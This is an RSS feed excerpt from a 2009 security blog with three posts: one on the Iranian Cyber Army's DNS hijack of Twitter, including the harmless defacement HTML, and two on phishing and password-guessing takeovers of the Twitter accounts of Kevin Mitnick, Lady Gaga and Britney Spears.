<p>Ah yes, the blitzkrieg online cyberwar has begun. Let me get my hat. If by sophisticated you mean &#8220;is able to use a web site&#8221; and &#8220;knows how to use &#8216;whois&#8217;&#8221; then yes, a highly sophisticated assault.</p>

<p><i>The attack last night on Twitter was clear retribution for the role that the service played during the [post-Iran election] 
demonstrations, and the role that it continues to play today. We have spoken to a number of sources overnight who have 
told us that the Iranian Cyber Army, unlike other groups with similar national monikers, is a group name that is to be taken 
literally, i.e. it is an Iranian government group. Little is known about how the group operates, but previous attempts to shut 
off Iranian citizens from Twitter and other web services demonstrate that Iran has the capability and will to use almost any 
means to control the flow of information on the web both within and outside of its own borders. </i></p>

<p><a href="http://www.washingtonpost.com/wp-dyn/content/article/2009/12/18/AR2009121801982.html">http://www.washingtonpost.com/wp-dyn/content/article/2009/12/18/AR2009121801982.html</a></p>

<p>Do these sources have names or credibility of any kind? Because while this could be a government sponsored group, it could be a pissed off Islamic kid, a group of guys who communicate in an Arabic hacking forum, or any number of things.</p>

<p><i>In a web war, Iran has demonstrated that almost nobody is immune, the battlefield is level and it is not afraid to fire the first big shots in full view of the entire world.</i></p>

<p><a href="http://www.techcrunch.com/2009/12/18/twitter-dns-attack-iran/">http://www.techcrunch.com/2009/12/18/twitter-dns-attack-iran/</a></p>

<p>Are we in a web war with Iran? Because no one has one iota of proof yet that this is an Iranian government sponsored group. For reference, the battlefield is not level if we are in a war: U.S. dependence on technology is far greater than Iran&#8217;s. If they&#8217;re ready to step up beyond logging in to an accessible web portal and changing a DNS entry at a managed DNS provider, they could really cause a lot of trouble.</p>

<p><i>With a large-scale attack on a popular global web service, it is the first time that cyber attacks have been used as part of a propaganda campaign to propel the global political agenda of a foreign government.</i></p>

<p><a href="http://www.techcrunch.com/2009/12/18/twitter-dns-attack-iran/">http://www.techcrunch.com/2009/12/18/twitter-dns-attack-iran/</a></p>

<p>Really? I could have sworn I&#8217;ve seen <a href="http://www.scmagazineus.com/web-defacements-escalate-as-israel-moves-farther-into-gaza/article/123542/">web sites defaced for political propaganda purposes before</a>.</p>

<h3>The HTML</h3>

<p>Since these sites may be taken down at any point, if you want to do further research, here is the HTML that was being returned from the defaced web site:</p>

<pre><code>&lt;html&gt;

&lt;head&gt;
&lt;meta http-equiv="Content-Language" content="en-us"&gt;
&lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;
&lt;title&gt;..:: This Web Site Has Been Hacked By Iranian Cyber Army ::.. &lt;/title&gt;
&lt;/head&gt;

&lt;body bgcolor="#000000"&gt;

&lt;p align="center"&gt;&amp;nbsp;&lt;/p&gt;
&lt;p align="center"&gt;&lt;img border="0" src="index.6.gif"&gt;&lt;img border="0" src="index.2.gif"&gt;&lt;img border="0" 
src="index.7.gif"&gt;&lt;/p&gt;
&lt;p align="center"&gt;&lt;img border="0" src="index.8.gif"&gt;&lt;/p&gt;
&lt;p align="center"&gt;
&lt;a href="mailto:iranian.cyber.army@gmail.com?subject=Mowjcamp"&gt;
&lt;img border="0" src="index.5.gif"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p align="center"&gt;&lt;img border="0" src="index.3.jpg" width="43%" height="106%"&gt;&lt;/p&gt;
&lt;p align="center"&gt;&lt;font face="Tahoma" size="2"&gt;&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
&lt;p align="center"&gt;&lt;b&gt;&lt;font face="Tahoma" size="2" color="#FFFFFF"&gt;nbsp;
&amp;#1576;&amp;#1606;&amp;#1575;&amp;#1605; &amp;#1582;&amp;#1583;&amp;#1575;&lt;br&gt;
&amp;#1576;&amp;#1607; &amp;#1593;&amp;#1606;&amp;#1608;&amp;#1575;&amp;#1606; &amp;#1740;&amp;#1705; 
&amp;#1575;&amp;#1740;&amp;#1585;&amp;#1575;&amp;#1606;&amp;#1740; &amp;#1583;&amp;#1585; &amp;#1662;&amp;#1575;&amp;#1587;&amp;#1582; 
&amp;#1576;&amp;#1607; &amp;#1583;&amp;#1582;&amp;#1575;&amp;#1604;&amp;#1578; &amp;#1607;&amp;#1575;&amp;#1740; 
&amp;#1588;&amp;#1740;&amp;#1591;&amp;#1606;&amp;#1578; &amp;#1570;&amp;#1605;&amp;#1740;&amp;#1586; &amp;#1575;&amp;#1740;&amp;#1606; 
&amp;#1587;&amp;#1585;&amp;#1608;&amp;#1740;&amp;#1587; &amp;#1583;&amp;#1607;&amp;#1606;&amp;#1583;&amp;#1607; &amp;#1576;&amp;#1607; 
&amp;#1583;&amp;#1587;&amp;#1578;&amp;#1608;&amp;#1585; 

&amp;#1605;&amp;#1602;&amp;#1575;&amp;#1605;&amp;#1575;&amp;#1578; 
&amp;#1570;&amp;#1605;&amp;#1585;&amp;#1740;&amp;#1705;&amp;#1575;&amp;#1740;&amp;#1740; &amp;#1583;&amp;#1585; 
&amp;#1575;&amp;#1605;&amp;#1608;&amp;#1585; &amp;#1583;&amp;#1575;&amp;#1582;&amp;#1604;&amp;#1740; 
&amp;#1705;&amp;#1588;&amp;#1608;&amp;#1585;&amp;#1605; )&amp;nbsp; &lt;br&gt;
&amp;#1575;&amp;#1740;&amp;#1606; &amp;#1587;&amp;#1575;&amp;#1740;&amp;#1578; &amp;#1576;&amp;#1607; 
&amp;#1593;&amp;#1606;&amp;#1608;&amp;#1575;&amp;#1606; &amp;#1607;&amp;#1588;&amp;#1583;&amp;#1575;&amp;#1585; &amp;#1607;&amp;#1705; 
&amp;#1605;&amp;#1740; &amp;#1588;&amp;#1608;&amp;#1583; &lt;br&gt;

&amp;nbsp;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;

&lt;/body&gt;

&lt;/html&gt;
</code></pre>

<h3>Finally</h3>

<p>Although Twitter&#8217;s security posture has been a well publicized running disaster, this particular circumstance doesn&#8217;t really fall under the same category as previous problems because this was an attack outside of the Twitter infrastructure itself. TechCrunch threw something out there about changing your passwords, always a good practice, but your password was probably not at risk during this attack.</p>

<p>Who says the crackers&#8217; only motivation is money these days?</p>

<p>Critical services such as DNS, BGP routers, and any other service that can single-handedly take down your entire company should be protected by two-factor authentication. Looking at Dyn&#8217;s login page on the website, it appears the service uses standard username and password authentication without support for two-factor authentication, something we would suggest that they change, or at least offer at cost to larger clients.</p>

<p>But the real crime, as youngluck noted on TechCrunch: <i>&#8220;Actually, the sad thing here is that an “army” with enough sophistication to take down Twitter, could have a graphic design department that could suck this bad.&#8221;</i></p>

<p>We&#8217;ll update the post if Twitter uncharacteristically provides more information about what happened.</p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/newsweek-reports-zombie-invasion/">Newsweek Reports Zombie Invasion</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/06/going-after-bp/">Going After BP</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/congressional-web-site-defacements-follow-the-state-of-the-union/">Congressional Web Site Defacements Follow the State of the Union</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/umm-techcrunch-defacement-two-in-24-hours/">Umm&#8230;TechCrunch? Defacement Two in 24 Hours</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/techcrunched-techcrunch-the-victim-of-a-defacement/">TechCrunched &#8211; TechCrunch the Victim of a Defacement</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/12/we-shall-strike-if-the-leader-orders-twitter-struck-by-iranian-cyber-army/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>“Hi. This you?? LOL” Twitter Attack Snares Kevin Mitnick</title>
		<link>http://praetorianprefect.com/archives/2009/11/%e2%80%9chi-this-you-lol%e2%80%9d-twitter-attack-snares-kevin-mitnick/</link>
		<comments>http://praetorianprefect.com/archives/2009/11/%e2%80%9chi-this-you-lol%e2%80%9d-twitter-attack-snares-kevin-mitnick/#comments</comments>
		<pubDate>Mon, 30 Nov 2009 16:16:33 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Social Networking]]></category>
		<category><![CDATA[authentication]]></category>
		<category><![CDATA[brute force]]></category>
		<category><![CDATA[mitnick]]></category>
		<category><![CDATA[twitter]]></category>
		<category><![CDATA[worm]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=1811</guid>
		<description><![CDATA[Historically the “Is this you?” style Twitter attack seems to be seeded by either an original break in to the victim’s Twitter account, or that user having provided his or her credentials to a phishing style web site made to look like Twitter as the attack propagates through the popular micro-blogging service. This time around however, the <a href="http://www.twitter.com/KevinMitnick">account</a> of security consultant and former cracker Kevin Mitnick was caught up in this generic, untargeted Twitter “worm”.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2009/11/Mitnick_Color_bigger.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/11/Mitnick_Color_bigger.jpg" alt="Mitnick_Color_bigger" title="Mitnick_Color_bigger" width="73" height="73" class="alignleft size-full wp-image-1814" /></a>Historically the “Is this you?” style Twitter attack seems to be seeded by either an original break in to the victim’s Twitter account, or that user having provided his or her credentials to a phishing style web site made to look like Twitter as the attack propagates through the popular micro-blogging service. This time around however, the <a href="http://www.twitter.com/KevinMitnick">account</a> of security consultant and former cracker Kevin Mitnick was caught up in this generic, untargeted Twitter “worm”.</p>

<div id="attachment_1835" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/12/mitnick_twitter.png"><img src="http://praetorianprefect.com/wp-content/uploads/2009/12/mitnick_twitter-300x39.png" alt="The @KevinMitnick twitter account message linking to a phishing site." title="mitnick_twitter" width="300" height="39" class="size-medium wp-image-1835" /></a><p class="wp-caption-text">The @KevinMitnick tweet linking to a phishing site.</p></div>

<h3>This Attack</h3>

<p>TweetMixx contains 889 references to this URL and the same message, so Kevin’s account wasn’t the only one the bad actors used to spam Twitter accounts. The URL referenced, http://pduda.mobi/adgga, is a shortened URL which appears to lead to http://albums.twitter.placement-selection.com, a spoofed Twitter authentication page. The .mobi extension is a top level domain for mobile sites.</p>

<p>This scam also appears to have been perpetuated with messages such as:</p>

<ul>
<li>“I think I found ur high school photo &lt;spam link&gt;”</li>
<li>“My friend shoed me you on here:”</li>
<li>“hi, I want to see if you will score higher on this iq test. take it here&#8221;</li>
<li>“see if your iq is higher than mine. Take the iq quiz&#8221;</li>
</ul>

<p>These tweets have appeared all over Twitter in the last week of November. This second scam sometimes includes a link with the same sub-domain structure as the one above (twitter is spelled wrong in the sub-domain), but with a different second-level domain (sarrispromo.com). Both domains lead directly to the spoofed Twitter login page with the extra “>” angle bracket character we have seen before.</p>

<div id="attachment_1812" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/11/twitter_phishing.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/11/twitter_phishing-300x155.jpg" alt="Spoofed Twitter login page." title="twitter_phishing" width="300" height="155" class="size-medium wp-image-1812" /></a><p class="wp-caption-text">Spoofed Twitter login page.</p></div>
<p>But this attack is doing something interesting: in some cases it includes a “via @username” before the spam message. This could represent going to the next level of social engineering by not only having the spam message come from a user account you are linked to, but also claiming essentially to be a retweet (“via” is used in Twitter messages to attribute a piece of information) of another trusted source’s information. Alternatively it could be a method for avoiding the web site display resulting from Twitter’s new handling of the classic method for retweets (RT @Username: message), which many users have objected to.</p>

<p>Both domains are hosted on the same IP address; IP geolocation shows this to be hosted in Hebei, China. Both reference the web site contact lixing688@gmail.com which has been seen in <a href="http://praetorianprefect.com/archives/2009/09/rofl-this-you-on-here-the-latest-twitter-worm/">earlier Twitter attacks</a>.</p>

<h3>The History That is Mitnick</h3>

<p>Mitnick is often cited as the Frank Abagnale (the famous check counterfeiter featured in ‘Catch Me If You Can’) of computer security, but the actual history of Kevin Mitnick is an unmitigated mess. He is well known in computer security circles as a former cracker turned security consultant and author, which is where the Abagnale comparison comes into play. He is acknowledged for the most part as being an expert in social engineering and for successful phone phreaking exploits. In 1988 he was convicted and sentenced to 12 months in prison after breaking into and copying software from Digital Equipment Corporation (DEC). After release he cracked into voice mail computers of Pacific Bell, a warrant was issued for his arrest, and he fled, all the while continuing to crack into systems. Among his confirmed criminal acts are cracking into the systems of Motorola, NEC, Nokia, Sun Microsystems, and Fujitsu Siemens, the aforementioned crack into DEC systems to look at VMS source code, gaining admin access on a Computer Learning Center IBM minicomputer, and using the Los Angeles bus transfer system to get free rides as a kid.</p>

<p><a href="http://praetorianprefect.com/wp-content/uploads/2009/11/Mugshot.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/11/Mugshot.jpg" alt="Mugshot" title="Mugshot" width="289" height="289" class="alignleft size-full wp-image-1815" /></a></p>

<p>After a <a href="http://www.justice.gov/criminal/cybercrime/mitnick.htm">highly publicized pursuit</a>, Mitnick was taken into custody by the FBI in Raleigh, NC in 1995 and in 1999 as part of a plea agreement confessed to four counts of wire fraud, two counts of computer fraud, and one count of illegal interception of a wire communication. He received 46 months plus an additional 22 months for violating the terms of his 1989 supervised release. Four and a half years of his sentence were served pre-trial (right to a speedy trial?) with eight months in solitary confinement due to unreasonable projections of his capabilities by law enforcement, including the oft-repeated claim that he could &#8220;start a nuclear war by whistling into a telephone.&#8221;</p>

<p>On January 1st, 2000 he was released and subsequently founded <a href="http://mitnicksecurity.com">Mitnick Security Consulting LLC</a>. He has written two books, <em>The Art of Deception</em> and <em>The Art of Intrusion</em>, and contributed to the 2009 release of <em>Unauthorized Access</em> written with Wil Allsopp.</p>

<div id="attachment_1813" class="wp-caption alignright" style="width: 215px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/11/Hacker_Tsutomu-Shimomura.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/11/Hacker_Tsutomu-Shimomura-205x300.jpg" alt="Controversial author and Mitnick sleuth Tsutomu Shimomura." title="Hacker_Tsutomu Shimomura" width="205" height="300" class="size-medium wp-image-1813" /></a><p class="wp-caption-text">Controversial author and Mitnick sleuth Tsutomu Shimomura.</p></div>

<p>Past the accepted facts, the story becomes murky. We are left to rely on the story of Mitnick himself, the FBI, a highly controversial book by John Markoff (NY Times journalist) and Tsutomu Shimomura called <em><a href="http://www.amazon.com/Takedown-Pursuit-Americas-Computer-Outlaw/dp/0786889136">Take-Down</a></em> and a follow up book by author Jonathan Littman, <em><a href="http://www.amazon.com/Fugitive-Game-Online-Kevin-Mitnick/dp/0316528692">The Fugitive Game: Online with Kevin Mitnick</a></em>, which seeks to debunk as fiction much of what is presented in <em>Takedown</em>.  The FBI acknowledges the <a href="http://www.justice.gov/opa/pr/Pre_96/February95/89.txt.html">involvement of Shimomura in a very limited way</a>, but the inconsistencies in his book have made it problematic to believe much of his story.</p>

<p>Markoff also wrote <em><a href="http://www.amazon.com/CYBERPUNK-Outlaws-Hackers-Computer-Frontier/dp/0684818620">Cyberpunk</a></em>, which tells the stories of Mitnick and others, but has been criticized for not actually interviewing the still living subjects about their exploits. Mitnick himself was largely under a gag order that ran until January 29th, 2007; the next month he announced he was writing an autobiography, which has yet to be released (expected Spring 2010).</p>

<h3>Not a First Timer</h3>

<p>Mitnick has been a victim of crackers before, although those were targeted attacks. Most recently, in July of 2009 on the eve of the Black Hat Conference, his web site was defaced with gay pornography and the message &#8220;all aboard the mantrain”. Think train to get an understanding of the image displayed. The group Zero for 0wned (zf0) <a href="http://r00tsecurity.org/files/zf05.txt">published details of their exploits</a> against Mitnick as well as other security professionals along with commentary:</p>

<pre><code>Kevin has become the media rep for the hacker community, something which he has grown further and 
further apart from ever since his release. Without John Markoff's sensationalist reporting Kevin Mitnick 
would not have the notoriety that allows him to earn his money providing keynotes at conferences all over 
the world. Kevin is polluting the media with bullshit. Whilst we understand that owning him is something 
which has been done many, many times, we felt that not presenting his insecurity publicly would be wrong. 
Since 2003 this has been done three times of note and Kevin has used his enormously powerful SOCIAL 
ENGINEERING techniques to escape with an unharmed reputation each time. The fact is that he cannot
secure his systems because he does not know how.
</code></pre>

<p>From <a href="http://r00tsecurity.org/files/zf05.txt">Summer of Hax</a>, July 28th, 2009 by zf0.</p>

<h3>What does the Twitter compromise prove?</h3>

<p>Let’s assume Kevin is adept enough that he did not provide his credentials to a fake Twitter site. This also does not look like a targeted attack; rather it looks as though his account was caught up in a generic spamming attack against Twitter. What are we left with: a weak or easily guessable/brute forced password? Have bad actors figured out the CAPTCHA mechanism in an efficient way for password brute forcing, or are they <a href="http://praetorianprefect.com/archives/2009/09/breaking-twitter-authentication/">breaking in via the Twitter application program interface</a>? The Twitter API represents a delicate balancing act for Twitter: much of the popularity of their service is based on the ability of developers to release tools based on the API, so it can not be left as a weak authentication path, but it also can not be overly onerous to use. Twitter engineers are faced then with an unenviable challenge.</p>

<p>This might demonstrate the pervasiveness of attacks on Twitter, as even security personalities are not immune to account hijack. It would depend largely on the attack vector: how were the credentials for Kevin’s account exposed, and was his password of sufficient complexity? However, if the password was of sufficient complexity, if credentials were not provided to a phishing web site, and if the credentials are not the same ones used at another web site with weaker security controls, then there may be little to question the victim on.</p>

<p>Rather this juncture is again an excellent opportunity for Twitter to research their logs and start reporting to the world what they are actually seeing (failed password attempts, exploitation of alternate authentication paths with weaker controls, etc.). It is time to publish the ‘Twitter Security’ blog. Hiring a head of information security to write it would be a great first step (he or she could work on other things at Twitter while there).</p>

<p>But maybe this is summarized best as Adrian Lamo, the former grey hat hacker now journalist famed for his 2002 break in to the New York Times, <a href="http://twitter.com/6/status/6212600902">who stated</a> in relation to this compromise: “These things happen.”</p>

<h3>Updates:</h3>

<ul>
<li>Kevin Mitnick responds: <em>&#8220;Yup, I used a VERY simple password just as I do for junk accounts like latimes.com, etc. Now it&#8217;s just a little bit harder, but not much :-) &#8221;</em></li>
</ul>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/persistent-xss-on-twitter-com/">Persistent XSS on Twitter.com</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/12/james-lipton-says-dont-tweet-your-junk/">James Lipton says &#8220;Don&#8217;t tweet your junk&#8221;</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/11/not-the-haus-of-gaga-too/">Not the Haus of Gaga too</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/10/facebook%e2%80%99s-faith-a-new-scareware-attack/">Facebook’s Faith: A New Scareware Attack</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/09/breaking-twitter-authentication/">Breaking Twitter (authentication)</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/11/%e2%80%9chi-this-you-lol%e2%80%9d-twitter-attack-snares-kevin-mitnick/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Not the Haus of Gaga too</title>
		<link>http://praetorianprefect.com/archives/2009/11/not-the-haus-of-gaga-too/</link>
		<comments>http://praetorianprefect.com/archives/2009/11/not-the-haus-of-gaga-too/#comments</comments>
		<pubDate>Tue, 17 Nov 2009 08:20:58 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Social Networking]]></category>
		<category><![CDATA[brute forcing]]></category>
		<category><![CDATA[defacement]]></category>
		<category><![CDATA[passwords]]></category>
		<category><![CDATA[twitter]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=1723</guid>
		<description><![CDATA[Around 9pm EST on Monday the Twitter account of pop singer Lady Gaga, <a href="http://www.twitter.com/ladygaga">@ladygaga</a> was cracked in to and a series of messages added to her tweet stream. This is the second high profile Twitter account to be cracked in the last few days, on Friday the account of pop singer Britney Spears, @BritneySpears, started professing sympathy for the devil. The Lady Gaga one is interesting though, because like an homage to old school cracks of the past, the attackers appear to have left their name. Further these are two high profile accounts broken into after Twitter has implemented at least three major changes to their web site's authentication process.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2009/11/lady_gaga_hacked.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/11/lady_gaga_hacked-150x150.jpg" alt="lady_gaga_hacked" title="lady_gaga_hacked" width="150" height="150" class="alignleft size-thumbnail wp-image-1734" /></a>Around 9pm EST on Monday the Twitter account of pop singer Lady Gaga, <a href="http://www.twitter.com/ladygaga">@ladygaga</a> was cracked in to and a series of messages added to her tweet stream. This is the second high profile Twitter account to be cracked in the last few days, on Friday the account of pop singer Britney Spears, @BritneySpears, started professing sympathy for the devil. The Lady Gaga one is interesting though, because like an homage to old school cracks of the past, the attackers appear to have left their name. Further these are two high profile accounts broken into after Twitter has implemented at least three major changes to their web site&#8217;s authentication process.
<br /><br /><br />
Around 9pm users who follow @ladygaga started to get the following messages:</p>

<ul>
<li>&lt;3 &lt;3 &lt;3 @T3ETH NXT TIME REALNESS PIC A BETTER PASSWORD!!!! PVNKS UNITE!!!</li>
<li>&lt;3 LADY GAGA &#8211; NO HATE INTENDED!!!! CAN&#8217;T WAIT 4 THE MONSTER BALL!!!!</li>
<li>&#8230;butt LADY GAGA RULEZ THE WORLD!!!!! Warhol are you listening?!!</li>
<li>I swear my dick is not as big as T33TH’S!!!! POPWRLDSUCKZ!!! PUNX UNITE!!!! &lt;3</li>
<li>GAGA PEECE FOR LYFE!!!</li>
<li>Hay my babies!!! LOVE GAGA??? LOVE T33TH!!! http://www.myspace.com/teethdance</li>
</ul>

<p><div id="attachment_1747" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/11/ladygaga_hack.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/11/ladygaga_hack-300x203.jpg" alt="Strange tweets showing up in Lady Gaga&#039;s tweetstream." title="ladygaga_hack" width="300" height="203" class="size-medium wp-image-1747" /></a><p class="wp-caption-text">Strange tweets showing up in Lady Gaga's tweetstream.</p></div>
<br />
In this case it appears the cracker signed his or her or their work, referencing the Twitter account <a href="http://www.twitter.com/t3eth">@t3eth</a> and the <a href="http://www.myspace.com/teethdance">MySpace fan page: teethdance</a>.</p>

<p><div id="attachment_1733" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/11/173072.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/11/173072-300x200.jpg" alt="London band Teeth." title="173072" width="300" height="200" class="size-medium wp-image-1733" /></a><p class="wp-caption-text">London band Teeth.</p></div>
<br />
<div id="attachment_1776" class="wp-caption alignnone" style="width: 309px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/11/n35408829631_1342856_3278.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/11/n35408829631_1342856_3278-299x300.jpg" alt="The London band T3eth, suspected of hacking the account." title="n35408829631_1342856_3278" width="299" height="300" class="size-medium wp-image-1776" /></a><p class="wp-caption-text">The London band T3eth, suspected of hacking the account.</p></div>
<br />
The defacers appear to be members of the band Teeth: Ximon Tayki, Simon Whybray and Veronica So from the Dalston district in London, UK. This assumption is drawn from the fact that a link to their MySpace page was provided in one of the first tweets, and they seem to reference the defacement <a href="http://twitter.com/T3ETH">in their tweets</a> responding to other Twitter users either congratulating them or giving them a hard time. All of this is circumstantial evidence, but the Twitter account is well established and has similar branding to the MySpace page. But of course someone could have done all this and just pointed back to the band.
<br /><br /></p>

<h3>Anonymous?</h3>

<p>The lone offensive tweet references the Internet hoax that suggested Lady Gaga was a hermaphrodite, perpetuated initially by the Youtube video below and a <a href="http://bossip.com/139759/chicks-with-dcks-is-lady-gaga-packing/">fake quote</a>:
<br /><br /></p>

<pre><code>It’s not something that I’m ashamed of, just isn’t something that I go around telling everyone. Yes. I 
have both male and female genitalia, but I consider myself a female. It’s just a little bit of a penis 
and really doesn’t interfere much with my life. The reason I haven’t talked about it is that it’s not a 
big deal to me. Like come on. It’s not like we all go around talking about our vags. I think this is
a great opportunity to make other multiple gendered people feel more comfortable with their bodies. 
I’m sexy, I’m hot. I have both a poon and a peener. Big f*cking deal. 
- Attributed to Lady Gaga
</code></pre>

<p><object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/i23qGLw3H_Y&#038;hl=en_US&#038;fs=1&#038;"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/i23qGLw3H_Y&#038;hl=en_US&#038;fs=1&#038;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object></p>

<p>I only bother including the video because it contains a reference to another famous Internet group: Anonymous. No conspiracy, it&#8217;s just amusing to see Guy Fawkes in the beginning of the video hanging out with the Lady Gaga crowd.</p>

<p><div id="attachment_1752" class="wp-caption alignnone" style="width: 287px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/11/anonymous_gagacrowd.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/11/anonymous_gagacrowd-277x300.jpg" alt="Anonymous hanging out at the Lady Gaga concert." title="anonymous_gagacrowd" width="277" height="300" class="size-medium wp-image-1752" /></a><p class="wp-caption-text">Anonymous hanging out at the Lady Gaga concert.</p></div>
<br />
Anonymous is that loose affiliation of Internet denizens known for various hoaxes, blaming things on ripoff site eBaum&#8217;sWorld, and probably most famously Project Chanology, a protest against the Church of Scientology. The members are also known for wearing Guy Fawkes masks:</p>

<p><div id="attachment_1724" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/11/Anonymous_Scientology_9_by_David_Shankbone.JPG"><img src="http://praetorianprefect.com/wp-content/uploads/2009/11/Anonymous_Scientology_9_by_David_Shankbone-300x225.jpg" alt="Members of Anonymous protesting Scientology." title="Anonymous_Scientology_9_by_David_Shankbone" width="300" height="225" class="size-medium wp-image-1724" /></a><p class="wp-caption-text">Members of Anonymous protesting Scientology.</p></div>
<br /></p>

<h3>Britney</h3>

<p>On Friday, Britney Spears appeared to be letting us in on a previously unknown penchant for devil worship:</p>

<p><div id="attachment_1735" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/11/spears_hacked.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/11/spears_hacked-300x158.jpg" alt="The appearance of the Britney Spears Twitter account on Friday." title="spears_hacked" width="300" height="158" class="size-medium wp-image-1735" /></a><p class="wp-caption-text">The appearance of the Britney Spears Twitter account on Friday.</p></div>
<br />
As an aside, the Britney Spears Twitter account <a href="http://www.twitter.com/BritneySpears">@BritneySpears</a>, like the @ladygaga account, is listed by Twitter as a <i>Verified Account</i>, a service offered by Twitter for certain accounts of famous persons (politicians, actors/actresses, singers, athletes) that are at a high risk of impersonation on the micro-blogging service. This service was brought about in part because of a well publicized lawsuit by baseball manager Tony LaRussa, who went after Twitter for an account on their service that was pretending to be him.</p>

<h3>Why is this News?</h3>

<p>Celebrities having their Twitter accounts cracked doesn&#8217;t seem like a new problem, and indeed Britney did report herself dead via Twitter back on June 28th. But there is a difference, and that is that many of the openings for easily brute forcing the Twitter password via the web site have closed. Note I said easily; don&#8217;t spam the comments with speculation on how the account was compromised (unless it&#8217;s high quality speculation), we know quite well that Twitter is still far from security nirvana.</p>

<p>Twitter has been slowly closing loopholes in their authentication process over the course of this year. <a href="http://praetorianprefect.com/archives/2009/09/rofl-this-you-on-here-the-latest-twitter-worm/">Back in September</a> we pointed out the reCAPTCHA implementation on login that shows up when you enter too many bad authentication attempts, a key difference in the process from when the rash of prominent account break-ins occurred earlier in the year (including the notable crack of a Twitter admin&#8217;s account). Twitter has more recently started to lock out accounts for an hour when too many bad passwords are provided (a lousy idea from a security perspective, but we&#8217;ll get into that some other time).</p>

<p>In <a href="http://praetorianprefect.com/archives/2009/09/breaking-twitter-authentication/">Breaking Twitter</a> we showed how Twitter rate limits were not enforced as advertised in their API documentation, allowing brute force of passwords via the API. Well that hole has <em>somewhat</em> closed (we&#8217;ll touch on that in a future post as well).</p>

<p>Now in the Lady Gaga case, Teeth seems to be admitting that they successfully guessed the password, so fair enough for that one. What about the Britney case, given that what was once a very obvious avenue of attack (point a password brute forcing tool and click) has become a little less obvious? Maybe it&#8217;s someone in her entourage, or Kevin Federline?</p>

<p>PoPo Zao.</p>

<h3>Update</h3>

<ul>
<li>Lady Gaga had this to say today: <i>&#8220;Seems as though my twitter was hacked yesterday. I could be angry, except I secretly love how psychotically smart my fans are.&#8221;</i></li>
<li>It looks like Lady Gaga&#8217;s password was: JustDance1. That explains why it was easy to guess: it&#8217;s the title of one of her first hit songs. Hopefully she doesn&#8217;t fall into the category of people who use the same password on every web site.</li>
</ul>

<h3>References</h3>

<ul>
<li><a href="http://dazeddigital.com/Music/article/5854/1/Gnash_Your_Teeth">Gnash Your Teeth</a></li>
<li><a href="http://earsucker.com/2009/11/16/lady-gagas-twitter-hacked/">Lady Gaga’s Twitter hacked?</a></li>
</ul>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/persistent-xss-on-twitter-com/">Persistent XSS on Twitter.com</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/12/james-lipton-says-dont-tweet-your-junk/">James Lipton says &#8220;Don&#8217;t tweet your junk&#8221;</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/11/%e2%80%9chi-this-you-lol%e2%80%9d-twitter-attack-snares-kevin-mitnick/">“Hi. This you?? LOL” Twitter Attack Snares Kevin Mitnick</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/10/facebook%e2%80%99s-faith-a-new-scareware-attack/">Facebook’s Faith: A New Scareware Attack</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/09/breaking-twitter-authentication/">Breaking Twitter (authentication)</a></li>
</ul><br />
]]></content:encoded>
